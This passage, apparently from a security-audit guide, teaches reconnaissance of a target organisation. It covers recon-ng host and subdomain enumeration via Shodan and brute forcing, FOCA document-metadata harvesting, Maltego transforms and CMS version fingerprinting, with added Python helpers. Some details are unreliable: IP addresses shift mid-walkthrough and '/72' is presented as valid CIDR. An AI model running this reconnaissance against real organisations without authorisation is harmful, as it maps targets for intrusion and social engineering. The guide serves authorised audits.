middle_name (TEXT):
last_name (TEXT): Smith
email (TEXT): [email protected]
title (TEXT):
region (TEXT):
country (TEXT): USA
[recon-ng][websitename] > add contacts
first_name (TEXT): Carl
middle_name (TEXT):
last_name (TEXT): Johnson
email (TEXT): [email protected]
title (TEXT):
region (TEXT):
country (TEXT): USA
[recon-ng][websitename] >

Finally, we will add the IP addresses of their website.

[recon-ng][websitename] > add netblocks
netblock (TEXT): 174.154.167.69
[recon-ng][websitename] > add netblocks
netblock (TEXT): 96.127.170.121

Here it is in the database.

[recon-ng][websitename][shodan_net] > show netblocks

  +---------------------------------+
  | rowid |    netblock    | module |
  +---------------------------------+
  | 2     | 174.154.167.69 | base   |
  | 3     | 96.127.170.121 | base   |
  +---------------------------------+

Reconnaissance phase (netblocks example)

First, search for any modules that use netblocks as an input.

[recon-ng][websitename] > search netblocks-
[*] Searching for 'netblocks-'...

  Recon
  -----
    recon/netblocks-hosts/reverse_resolve
    recon/netblocks-hosts/shodan_net
    recon/netblocks-ports/census_2012

In the case of recon/netblocks-hosts/shodan_net we can see that the "shodan_net" module is a reconnaissance module that takes in netblocks and produces hosts.

Let's try it out.

[recon-ng][websitename] > use recon/netblocks-hosts/shodan_net
[recon-ng][websitename][shodan_net] >

An empty command line can be daunting. If you are ever unsure which commands are available in the current context, use the help command to list them.

[recon-ng][websitename][shodan_net] > help

Commands (type [help|?] <topic>):

add             Adds records to the database
back            Exits the current context
del             Deletes records from the database
exit            Exits the framework
help            Displays this menu
keys            Manages framework API keys
load            Loads selected module
pdb             Starts a Python Debugger session
query           Queries the database
record          Records commands to a resource file
resource        Executes commands from a resource file
run             Runs the module
search          Searches available modules
set             Sets module options
shell           Executes shell commands
show            Shows various framework items
spool           Spools output to a file
unset           Unsets module options
use             Loads selected module

Use the show info command to learn about the module and see what options are available.

[recon-ng][websitename][shodan_net] > show info

      Name: Shodan Network Enumerator
      Path: modules/recon/netblocks-hosts/shodan_net.py
    Author: Mike Siegel and Tim Tomes (@LaNMaSteR53)

Description:
  Harvests hosts from the Shodanhq.com API by using the 'net' search operator. Updates the 'hosts'
  table with the results.

Options:
  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  LIMIT   1              yes       limit number of api requests per input source (0 = unlimited)
  SOURCE  default        yes       source of input (see 'show info' for details)

Source Options:
  default        SELECT DISTINCT netblock FROM netblocks WHERE netblock IS NOT NULL ORDER BY netblock
  <string>       string representing a single input
  <path>         path to a file containing a list of inputs
  query <sql>    database query returning one column of inputs

[recon-ng][websitename][shodan_net] >

It pulls directly from the netblocks source that we set up. Now, use run to run the module.

[recon-ng][websitename] > use recon/netblocks-hosts/shodan_net
[recon-ng][websitename][shodan_net] > run

174.154.167.69
[*] Searching Shodan API for: net:174.154.167.69
[*] 174.154.167.69 (vps.websitename.org) - 7706
[*] 174.154.167.69 (vps.websitename.org) - 110
[*] 174.154.167.69 (vps.websitename.org) - 57
[*] 174.154.167.69 (vps.websitename.org) - 22
[*] 174.154.167.69 (vps.websitename.org) - 147
[*] 174.154.167.69 (vps.websitename.org) - 997
[*] 174.154.167.69 (vps.websitename.org) - 70
[*] 174.154.167.69 (vps.websitename.org) - 25

96.127.170.121
[*] Searching Shodan API for: net:96.127.170.121
[*] 96.127.170.121 (vps.websitename.org) - 7706
[*] 96.127.170.121 (vps.websitename.org) - 22
[*] 96.127.170.121 (vps.websitename.org) - 465
[*] 96.127.170.121 (vps.websitename.org) - 997
[*] 96.127.170.121 (vps.websitename.org) - 25
[*] 96.127.170.121 (vps.websitename.org) - 995
[*] 96.127.170.121 (vps.websitename.org) - 57
[*] 96.127.170.121 (vps.websitename.org) - 147
[*] 96.127.170.121 (vps.websitename.org) - 110
[*] 96.127.170.121 (vps.leillc.net) - 7070

SUMMARY
[*] 17 total (2 new) items found.

Since it promised hosts, let's see what hosts it uncovered.

[recon-ng][websitename][shodan_net] > show hosts

  +---------------------------------------------------------------------------------------------------+
  | rowid |        host       |   ip_address   | region | country | latitude | longitude |   module   |
  +---------------------------------------------------------------------------------------------------+
  | 1     | vps.websitename.org | 174.154.167.69 |      |         |          |           | shodan_net |
  | 2     | vps.websitename.org | 96.127.170.121 |      |         |          |           | shodan_net |
  | 3     | vps.leillc.net    | 96.127.170.121 |        |         |          |           | shodan_net |
  +---------------------------------------------------------------------------------------------------+

[*] 3 rows returned

It seems the domain leillc.net is obviously not associated with the organization we are doing recon on. Since this module has finished, we will leave it using the back command.

[recon-ng][websitename][shodan_net] > back
[recon-ng][websitename] >

Now we will use the other two netblock- modules. We will show one more and then skip the second.

First we find all the possible modules using tab completion.

[recon-ng][websitename] > use recon/netblocks-
recon/netblocks-hosts/reverse_resolve  recon/netblocks-hosts/shodan_net       recon/netblocks-ports/census_2012
[recon-ng][websitename] > use recon/netblocks-

We are going to use reverse_resolve.

[recon-ng][websitename][census_2012] > use recon/netblocks-hosts/reverse_resolve

But, when we run it we get an error!

[recon-ng][websitename][reverse_resolve] > run
174.154.167.69
[!] Need more than 1 value to unpack.

OPTIONAL: To figure out what went wrong, go back and then set DEBUG True to see the underlying error. The debug error message tells us that we need to use full netmask (CIDR) syntax for netblocks. We will now add new netblocks in the correct format and then delete the old ones.

First we will add them correctly.

[recon-ng][websitename][reverse_resolve] > add netblocks
netblock (TEXT): 177.154.167.69/72
[recon-ng][websitename][reverse_resolve] > add netblocks
netblock (TEXT): 96.127.170.121/72

Now we have duplicates of the same netblocks.

[recon-ng][websitename][reverse_resolve] > show netblocks

  +---------------------------------------------+
  | rowid |      netblock     |      module     |
  +---------------------------------------------+
  | 2     | 174.154.167.69    | base            |
  | 4     | 177.154.167.69/72 | reverse_resolve |
  | 3     | 96.127.170.121    | base            |
  | 5     | 96.127.170.121/72 | reverse_resolve |
  +---------------------------------------------+

[*] 4 rows returned

Now that we know their rowid numbers, we can delete the old entries.

[recon-ng][websitename][reverse_resolve] > del netblocks
rowid(s) (INT): 2
[recon-ng][websitename][reverse_resolve] > del netblocks
rowid(s) (INT): 3

And, re-running the module now works.

[recon-ng][websitename][reverse_resolve] > run

[*] 177.154.167.69 => dsl-177-154-167-69-dyn.prod-infinitum.com.mx
[*] 96.127.170.121 => vps.websitename.org

SUMMARY

[*] 2 total (1 new) items found.
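The error above came from feeding bare IP addresses to a module that expects address/prefix notation. As an added example (not part of recon-ng), the helper below normalises netblock seeds with Python's ipaddress module before they are added to the workspace: a bare address becomes a single-host block, a host address inside a block is widened to that block, malformed inputs are rejected with the parser's reason, and the address count tells the auditor how much a module will query before it runs. The sample inputs use documentation address ranges and are constructed.

```python
import ipaddress


def normalize_netblock(value: str) -> str:
    """Return the canonical CIDR string for a bare address or an address/prefix.

    Raises ValueError (as ipaddress does) for anything that is not a valid
    IPv4/IPv6 address or prefix, so bad seeds fail here rather than inside a
    module with an unhelpful message.
    """
    value = value.strip()
    if "/" not in value:
        # A bare address is the single-host block (/32 for IPv4, /128 for IPv6).
        addr = ipaddress.ip_address(value)
        return f"{addr}/{addr.max_prefixlen}"
    # strict=False lets a host address inside a block (e.g. x.y.z.10/28) pass,
    # returning the enclosing network; an out-of-range prefix still raises.
    return str(ipaddress.ip_network(value, strict=False))


def normalize_seeds(values):
    """Return (valid, rejected): valid is the de-duplicated list of canonical
    CIDRs in input order, rejected maps each bad input to the parser's reason."""
    valid, rejected, seen = [], {}, set()
    for v in values:
        try:
            cidr = normalize_netblock(v)
        except ValueError as exc:
            rejected[v] = str(exc)
            continue
        if cidr not in seen:
            seen.add(cidr)
            valid.append(cidr)
    return valid, rejected


def address_count(cidr: str) -> int:
    """How many addresses a block covers, i.e. how many reverse lookups or
    API calls a per-address module would make for it."""
    return ipaddress.ip_network(cidr).num_addresses


if __name__ == "__main__":
    # Constructed seeds: two spellings of one host, one block, two malformed entries.
    seeds = ["203.0.113.10", "203.0.113.10/32", "203.0.113.10/28",
             "203.0.113/24", "198.51.100.0/40"]
    ok, bad = normalize_seeds(seeds)
    for cidr in ok:
        print(f"{cidr:20} {address_count(cidr)} address(es)")
    for raw, why in bad.items():
        print(f"rejected {raw!r}: {why}")
```

Running the normaliser before `add netblocks` also avoids the duplicate rows the walkthrough had to clean up by rowid, since the same block in two spellings collapses to one canonical entry.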

Now, exploring these hosts, we quickly realize that most of the new hosts on other domains are not associated with the organization. Hence, we will remove them.

[recon-ng][websitename] > show hosts

  +-----------------------------------------------------------------------------------------------------------------------------------+
  | rowid |                     host                     |   ip_address   | region | country | latitude | longitude |      module     |
  +-----------------------------------------------------------------------------------------------------------------------------------+
  | 4     | dsl-177-154-167-69-dyn.prod-infinitum.com.mx | 177.154.167.69 |        |         |          |           | reverse_resolve |
  | 1     | vps.websitename.org                          | 174.154.167.69 |        |         |          |           | shodan_net      |
  | 2     | vps.websitename.org                          | 96.127.170.121 |        |         |          |           | shodan_net      |
  | 7     | vps.pineapplebob.net                         | 96.127.170.121 |        |         |          |           | shodan_net      |
  +-----------------------------------------------------------------------------------------------------------------------------------+

[*] 4 rows returned
[recon-ng][websitename] > del hosts
rowid(s) (INT): 4
[recon-ng][websitename] > del hosts
rowid(s) (INT): 7

We skip the last module recon/netblocks-ports/census_2012 since you already get the idea.

Sadly, none of the newly discovered hosts on other domains were actually useful.

Let's find new domains using brute forcing. First we should look for what is available.

[recon-ng][websitename] > search domains-domains
[*] Searching for 'domains-domains'...

  Recon
  -----
    recon/domains-domains/brute_suffix
[recon-ng][websitename] > use recon/domains-domains/brute_suffix
[recon-ng][websitename][brute_suffix] > run

-------------
WEBSITENAME.ORG
-------------
[*] websitename.ac => No record found.
[*] websitename.academy => No record found.
[*] websitename.ad => No record found.
[*] websitename.ae => No record found.
[*] websitename.aero => No record found.
[*] websitename.af => (SOA) websitename.af - Host found!
[*] websitename.ag => No record found.
[*] websitename.ai => No record found.
[*] websitename.al => No record found.
[*] websitename.am => (SOA) websitename.am - Host found!
[*] websitename.an => No record found.
[*] websitename.ao => No record found.
[*] websitename.aq => (SOA) websitename.aq - Host found!
[*] websitename.ar => No record found.
[*] websitename.arpa => No record found.
[*] websitename.as => No record found.
[*] websitename.asia => No record found.
[*] websitename.at => No record found.
[*] websitename.au => No record found.
[*] websitename.aw => (SOA) websitename.aw - Host found!
[*] websitename.ax => No record found.
[*] websitename.az => No record found.
[*] websitename.ba => No record found.
[*] websitename.bb => No record found.
[*] websitename.bd => No record found.
[*] websitename.be => No record found.
[*] websitename.berlin =>  (SOA) websitename.berlin - Host found!
...

This returned quite a few domains. We have removed the middle section of the output.

[recon-ng][websitename][brute_suffix] > show domains

  +------------------------------------------+
  | rowid |       domain      |    module    |
  +------------------------------------------+
  | 2     | websitename.af      | brute_suffix |
  | 7     | websitename.am      | brute_suffix |
  | 4     | websitename.asia    | brute_suffix |
  | 5     | websitename.aq      | brute_suffix |
  | 7     | websitename.bg      | brute_suffix |
             ....
             ....
             ....
  | 25    | websitename.net     | brute_suffix |
  | 1     | websitename.org     | base         |
  | 17    | websitename.uz      | brute_suffix |
  +------------------------------------------+

Many out of scope domains had to be removed, but luckily you can specify ranges when you delete.

[recon-ng][websitename][brute_suffix] > del domains
rowid(s) (INT): 72-44

There are a lot of domains-hosts modules, so we will only run a couple of them, since there is little new to learn from the rest.

[recon-ng][websitename][brute_suffix] > use recon/domains-hosts/baidu_site
[recon-ng][websitename][baidu_site] > run

------------
WEBSITENAME.EU
------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.eu
[*] www.websitename.eu
[*] Sleeping to avoid lockout...

------------
WEBSITENAME.FR
------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.fr

-------------
WEBSITENAME.ORG
-------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.org
[*] www.websitename.org
[*] things.websitename.org
[*] Sleeping to avoid lockout...

----------------
WEBSITENAME.ORG.UK
----------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.org.uk

------------
WEBSITENAME.COM
------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.com
[*] www.websitename.com
[*] Sleeping to avoid lockout...

-------
SUMMARY
-------
[*] 5 total (2 new) items found.
[recon-ng][websitename][baidu_site] > use recon/domains-hosts/brute_hosts
[recon-ng][websitename][brute_hosts] > run

-------------
WEBSITENAME.ORG
-------------
[*] No Wildcard DNS entry found.
[*] 0.websitename.org => No record found.
[*] 01.websitename.org => No record found.
[*] 02.websitename.org => No record found.
[*] 03.websitename.org => No record found.
[*] 1.websitename.org => No record found.
[*] 10.websitename.org => No record found.
[*] 11.websitename.org => No record found.
[*] 12.websitename.org => No record found.
[*] 13.websitename.org => No record found.
[*] 14.websitename.org => No record found.
[*] 15.websitename.org => No record found.
[*] 16.websitename.org => No record found.
[*] 17.websitename.org => No record found.
[*] 18.websitename.org => No record found.
[*] 19.websitename.org => No record found.
[*] 2.websitename.org => No record found.
[*] 20.websitename.org => No record found.
[*] 3.websitename.org => No record found.
[*] 3com.websitename.org => No record found.
[*] 4.websitename.org => No record found.
[*] 5.websitename.org => No record found.
[*] 6.websitename.org => No record found.
...
...
[*] autodiscover.websitename.org => (CNAME) autodiscover.websitename-mail.org - Host found!
[*] autodiscover.websitename.org => (A) autodiscover.websitename.org - Host found!
[*] autorun.websitename.org => No record found.
[*] av.websitename.org => No record found.
...
...
[recon-ng][websitename] > show hosts

  +------------------------------------------------------------------------------------------------------------------+
  | rowid |               host              |   ip_address   | region | country | latitude | longitude |    module   |
  +------------------------------------------------------------------------------------------------------------------+
  | 8     | autodiscover.websitename-mail.org |                |        |         |          |           | brute_hosts |
  | 9     | autodiscover.websitename.org      |                |        |         |          |           | brute_hosts |
  | 32    | autodiscover.websitename.com       |                |        |         |          |           | brute_hosts |
  | 10    | conference.websitename.org        |                |        |         |          |           | brute_hosts |
  | 12    | beta.websitename.org              |                |        |         |          |           | brute_hosts |
  | 5     | demo.websitename.org            |                |        |         |          |           | baidu_site  |
  | 14    | email.websitename.org             |                |        |         |          |           | brute_hosts |
  | 15    | intranet.websitename.org               |                |        |         |          |           | brute_hosts |
  | 16    | ftp.websitename.org               |                |        |         |          |           | brute_hosts |
  | 37    | ftp.websitename.com                |                |        |         |          |           | brute_hosts |
  | 13    | ftp2.websitename.org              |                |        |         |          |           | brute_hosts |
  | 11    | websitename.github.com            |                |        |         |          |           | brute_hosts |
  | 24    | websitename.org                   |                |        |         |          |           | brute_hosts |
  | 75    | websitename.com                    |                |        |         |          |           | brute_hosts |
  | 18    | localhost.websitename.org         |                |        |         |          |           | brute_hosts |
  | 19    | mail.websitename.org              |                |        |         |          |           | brute_hosts |
  | 36    | mail.websitename.com               |                |        |         |          |           | brute_hosts |
  | 20    | ns1.websitename.org               |                |        |         |          |           | brute_hosts |
  | 27    | temp.websitename.org              |                |        |         |          |           | brute_hosts |
  | 25    | test.websitename.org              |                |        |         |          |           | brute_hosts |
  | 1     | vps.websitename.org               | 174.174.177.77 |        |         |          |           | shodan_net  |
  | 2     | vps.websitename.org               | 77.127.170.121 |        |         |          |           | shodan_net  |
  | 27    | webmail.websitename.com            |                |        |         |          |           | brute_hosts |
  | 4     | www.websitename.org               |                |        |         |          |           | baidu_site  |
  | 7     | www.websitename.com                |                |        |         |          |           | baidu_site  |
  +------------------------------------------------------------------------------------------------------------------+

[*] 77 rows returned

NOTE: Many host gathering modules use other hosts as a starting place. It is important to sanitize the hosts database between modules to make sure that you do not start enumerating based upon incorrectly added hosts.

[recon-ng][websitename][census_2012] > query select hosts.ip_address, hosts.host, ports.host, ports.port from hosts join ports using (ip_address)

  +----------------------------------------------------------------------+
  |   ip_address   |           host           |        host       | port |
  +----------------------------------------------------------------------+
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 110  |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 147  |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 22   |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 27   |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 7707 |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 77   |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 70   |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 777  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 110  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 147  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 22   |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 27   |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 7707 |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 477  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 77   |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 777  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 777  |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 110  |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 147  |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 22   |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 27   |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 7707 |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 77   |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 70   |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 777  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 110  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 147  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 22   |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 27   |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 7707 |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 477  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 77   |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 777  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 777  |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 110  |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 147  |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 22   |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 27   |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 7707 |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 77   |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 70   |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 777  |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 110  |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 147  |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 22   |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 27   |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 7707 |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 77   |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 70   |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 777  |
  +----------------------------------------------------------------------+
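The NOTE above about sanitizing the hosts table between modules, and the hosts/ports join query just run, can both be worked through offline. The following added example (not recon-ng's code) loads constructed hosts and ports rows, modelled on the walkthrough, into an in-memory SQLite database (recon-ng keeps its workspace data in SQLite as well), deletes hosts that fall outside the organisation's domains using a label-boundary suffix match, and then runs the same join. The in-scope domain list, the sample rows and the column set are assumptions made for the example.

```python
import sqlite3

# Assumption: the organisation owns these domains; anything else is out of scope.
IN_SCOPE_DOMAINS = ("websitename.org", "websitename.com")

# Constructed sample rows (host, ip_address, module) modelled on the walkthrough;
# the addresses are documentation ranges, not real results.
SAMPLE_HOSTS = [
    ("vps.websitename.org", "203.0.113.10", "shodan_net"),
    ("vps.leillc.net", "203.0.113.10", "shodan_net"),
    ("www.websitename.org", "203.0.113.10", "baidu_site"),
    ("notwebsitename.org", "203.0.113.20", "brute_hosts"),
    ("dsl-198-51-100-7.example.net", "198.51.100.7", "reverse_resolve"),
    ("mail.websitename.com", None, "brute_hosts"),
]
# Constructed (ip_address, host, port, module) rows.
SAMPLE_PORTS = [
    ("203.0.113.10", "vps.websitename.org", 22, "shodan_net"),
    ("203.0.113.10", "vps.websitename.org", 25, "shodan_net"),
    ("203.0.113.20", "notwebsitename.org", 80, "shodan_net"),
]


def in_scope(host: str, domains=IN_SCOPE_DOMAINS) -> bool:
    """Suffix match on a label boundary: 'www.websitename.org' is in scope,
    'notwebsitename.org' is not, even though it ends with 'websitename.org'."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def build_db(hosts=SAMPLE_HOSTS, ports=SAMPLE_PORTS) -> sqlite3.Connection:
    """Create an in-memory workspace with hosts and ports tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE hosts (host TEXT, ip_address TEXT, module TEXT)")
    conn.execute("CREATE TABLE ports (ip_address TEXT, host TEXT, port INTEGER, module TEXT)")
    conn.executemany("INSERT INTO hosts VALUES (?, ?, ?)", hosts)
    conn.executemany("INSERT INTO ports VALUES (?, ?, ?, ?)", ports)
    conn.commit()
    return conn


def sanitize_hosts(conn: sqlite3.Connection, domains=IN_SCOPE_DOMAINS) -> list:
    """Delete out-of-scope hosts by rowid and return their names, sorted, so
    the removals can be recorded in the audit notes."""
    rows = conn.execute("SELECT rowid, host FROM hosts").fetchall()
    doomed = [(rid, h) for rid, h in rows if not in_scope(h, domains)]
    conn.executemany("DELETE FROM hosts WHERE rowid = ?", [(rid,) for rid, _ in doomed])
    conn.commit()
    return sorted(h for _, h in doomed)


def hosts_with_ports(conn: sqlite3.Connection) -> list:
    """The walkthrough's join, with DISTINCT so each (host, port) pair appears
    once; hosts with no ip_address (NULL) never match and are left out."""
    sql = """SELECT DISTINCT hosts.ip_address, hosts.host, ports.port
             FROM hosts JOIN ports USING (ip_address)
             ORDER BY hosts.host, ports.port"""
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("removed:", sanitize_hosts(db))
    for ip, host, port in hosts_with_ports(db):
        print(f"{ip:15} {host:25} {port}")
```

Run the sanitizer between every discovery module and the next one that reads the hosts table, not only at the end; the join result is also a compact list of which exposed services belong to which named host, which is what the on-site vulnerability work starts from.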
Reconnaissance: Next Steps

Reporting

[recon-ng][websitename] > use reporting/csv
[recon-ng][websitename][csv] >
[recon-ng][websitename][csv] > set TABLE Domains
TABLE => Domains
[recon-ng][websitename][csv] > set FILENAME /home/computer/.recon-ng/workspaces/websitename/Domains.csv
FILENAME => /home/computer/.recon-ng/workspaces/websitename/Domains.csv
[recon-ng][websitename][csv] > run
[*] 5 records added to '/home/computer/.recon-ng/workspaces/websitename/Domains.csv'.

Creating API Keys


Foca Analyzer

FOCA Quick Guide

Requirements:

Installing FOCA analyzer

Features & Functionality

FOCA has many features, web searches and DNS searches among them. To learn more about its functionality, visit FOCA's website.

Creating Your first Project:

To create a project in FOCA, click Project on the tab menu and select New Project.

There are a few items to fill in:

After completing the form, select the Create button.

Scan and Search:

After saving your project, it will bring you to the main window. On the upper right hand corner of your screen, you will see the two settings:

Click the Search All button below the Extension options to start the scan.

Note: FOCA will give you a warning regarding the IP address of the target and its netrange owner. This will be added to the alternative domain.

Analyzing Public Documents:

FOCA's results depend on the files/documents uploaded to the website that are "publicly available". There are situations where an organization may not have any publicly available documents. If that is the case, move on to the Maltego assessment activity.

However, if your scan does find files/documents, you can analyze them and extract metadata from the identified files.

Downloading Files:

Once the search/scan has completed, right-click on any file to download it. (NOTE: you can download files one-by-one, or all at once by selecting them with SHIFT+click. You can only extract metadata from files that have already been downloaded.) If the target website exposes a lot of files and documents, you may want to download them all at once.

Extracting Metadata:

After selecting one or more downloaded files, right-click and select Extract Metadata. You can analyze files one-by-one or all at once; to do the latter, first download all documents, then right-click and select Extract All Metadata. Once the metadata has been extracted, right-click again and select Analyze Metadata. (A green indicator appears once a file has been downloaded and analyzed, and a progress bar shows the download progress and elapsed time for each individual file.)

Analyzing Reports and Findings

After downloading documents and extracting metadata, you may view the results on the left side pane of your FOCA. On the left pane, you will see the following options:

Under Metadata you will have two sub-menus, Documents and Metadata Summary. The Documents option displays the scraped metadata per document/file, while the Metadata Summary option gives you the following:

This information can then be added to your records and used against other attack surfaces, such as social engineering.


Maltego

What is Maltego?

According to the Maltego's official website, they define maltego as: "An interactive data mining tool that renders directed graphs for link analysis. The tool is used in online investigations for finding relationships between pieces of information from various sources located on the Internet.

Maltego uses the idea of transforms to automate the process of querying different data sources. This information is then displayed on a node based graph suited for performing link analysis."

Maltego has many different uses:

These are just some of the ways you can use Maltego. In this guide, however, we will use Maltego for information gathering and data mining. The information we find will later be used in the following stages of the audit/vulnerability assessment/penetration test.

Maltego also has different versions:

For this exercise, we will be using the Maltego CE version.

Registration

Maltego is available in the latest release of Kali Linux. (See here) NOTE: To run Maltego, you first need to have an account. To register, click here. Consider carefully the operational security implications of this requirement, in particular if you use one account for multiple different audits.

Getting Started:

Before we proceed with this guide, let us first take a look at Maltego's three main concepts.

Running Maltego for the first time

To initialize Maltego, on your Kali Linux, click Applications > 01 - Information Gathering > Maltego. This will bring you to the "Home" screen of the Maltego application and will show you a list of available Transforms. Transforms are simply a set of activities that you can run against a specific target. We'll learn more of transforms in the following topics.

Creating a New Graph

To create a new graph where we can put our first task, click the Maltego icon on the upper left corner of your window, and click New. This will now open a blank screen, with the tab entitled New Graph.

Selecting a Palette Entity

The Entity Palette is located in the left pane. It contains all the entities you can use, depending on the activity you are going to perform. For this exercise, look for the Domain entity. Once you find it, drag and drop it onto the blank graph on the right; you now have an entity on your graph. Double-click the domain entity to rename it to your target (for this example, we use paterva.com).

Choosing Transforms

Once you have edited your entity, right-click it to open the Run Transform(s) menu. This lists all the transforms available to you (depending on which transforms you have installed).

For this exercise, click the + to the left of PATERVA CTAS CE. This gives us four transforms:

You can run each of these transforms individually, or click the >> icon to run All Transforms.

Once you click it, all transforms run against the paterva.com domain. The resulting graph will include:

You can then gather these results and use them in your next set of reconnaissance activities.

Recommendation

Website Footprinting

Summary

Using online tools as a starting point for assessing the auditee's web application is a good way to expand online reconnaissance as well as to start your vulnerability assessment. You can build a profile and a good understanding of the web application by identifying what comprises it and the technologies behind it. From there you can plan your next move by putting together different strategies for conducting your vulnerability assessment.

For example, after discovering accessible web directories, you can start looking for forgotten or abandoned files and applications that might contain sensitive information (such as passwords), or outdated and vulnerable applications. Content management systems, while powerful, require ongoing maintenance and updates to stay secure. Quite often these (or specific plugins) fall out of date and become increasingly vulnerable to automated as well as targeted attacks.

Online tools offer ways of performing "passive" scans, in which your identity is hidden from the target organization; this matters where IDS/IPS or firewalls are deployed. These should be used in conjunction with the other outputs from reconnaissance to determine which platforms and hosts are out of scope.

Overview
Materials Needed
Considerations
Walkthrough

Before unleashing more advanced and powerful tools like OpenVAS, a few quick steps can help guide your work. As a general note, browsing with at least NoScript enabled may not only help protect you, but may also help reveal malware or adware infecting the websites.

Record core details about the website: determine the hosting provider, platform, content management system, and other baseline data. BuiltWith is a great tool. There are a few alternatives, including an open source tool, SiteLab. Note that recon-ng bundles a BuiltWith module, but the output it provides is not currently stored in recon-ng's data structures. These tools may also reveal plugins, JavaScript libraries, and DDoS protection systems like CloudFlare.

Tools


CMS Version Detection

Identification of a CMS during web footprinting can be done either with scripts and tools or with online services.

You can use certain websites to determine the type of CMS a target website is using:

For CMS platforms, out-of-date components are usually well-known and easy for malicious actors to exploit.

Drupal

For Drupal, try visiting /CHANGELOG.txt which, if it has not been manually removed, reveals the most recent version of Drupal installed on the server. Other telltale signs depend on the specific Drupal release; http://corporate.adulmec.ro/blog/2010/drupal-detection-test-site-running-drupal maintains a detection tool.

Drupal 6.27, 2012-12-19
----------------------
- Fixed security issues (multiple vulnerabilities), see SA-CORE-2012-004.
Drupal 6.26, 2012-05-02
----------------------
- Fixed a small number of bugs.
- Made code documentation improvements.

Joomla

For Joomla, default templates provide strong hints towards versions based on copyright dates. Specific versions can often be discovered using this guide: https://www.gavick.com/magazine/how-to-check-the-version-of-joomla.html

WordPress

WordPress sites tend to advertise their version number in the header of each page, for example:

<meta name="generator" content="WordPress 3.3.1" />

There is a web-based tool with browser add-ons available here: http://www.whitefirdesign.com/tools/wordpress-version-check.html
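As an added example (not part of the SAFETAG guide, nor code from any of the tools it names), the Python below records the checks above in a script rather than by hand: it extracts a CMS name and version from a page's generator meta tag or from a Drupal CHANGELOG.txt body, and flags a CloudFlare-fronted site from its HTTP response headers (CloudFlare sets "Server: cloudflare" and a "CF-RAY" header). The HTML, changelog and header samples are constructed, not fetched from any real site, and the function names are the author's own.

```python
import re
from typing import Dict, Optional

# Constructed samples for the checks below (not captured from any real site).
WORDPRESS_HTML = (
    '<html><head><title>Sample</title>'
    '<meta name="generator" content="WordPress 3.3.1" /></head><body></body></html>'
)
DRUPAL_CHANGELOG = (
    "Drupal 6.27, 2012-12-19\n"
    "----------------------\n"
    "- Fixed security issues (multiple vulnerabilities), see SA-CORE-2012-004.\n"
    "Drupal 6.26, 2012-05-02\n"
    "----------------------\n"
    "- Fixed a small number of bugs.\n"
)
CLOUDFLARE_HEADERS = (
    "HTTP/1.1 200 OK\r\n"
    "Server: cloudflare\r\n"
    "CF-RAY: 0123456789abcdef-AMS\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
)

# <meta name="generator" content="WordPress 3.3.1" />; Joomla emits the same tag,
# normally without a version number, so the version field may stay empty.
GENERATOR_RE = re.compile(
    r'<meta\s+name=["\']generator["\']\s+content=["\']([^"\']+)["\']', re.IGNORECASE)
# The first entry in /CHANGELOG.txt is the most recent Drupal release installed.
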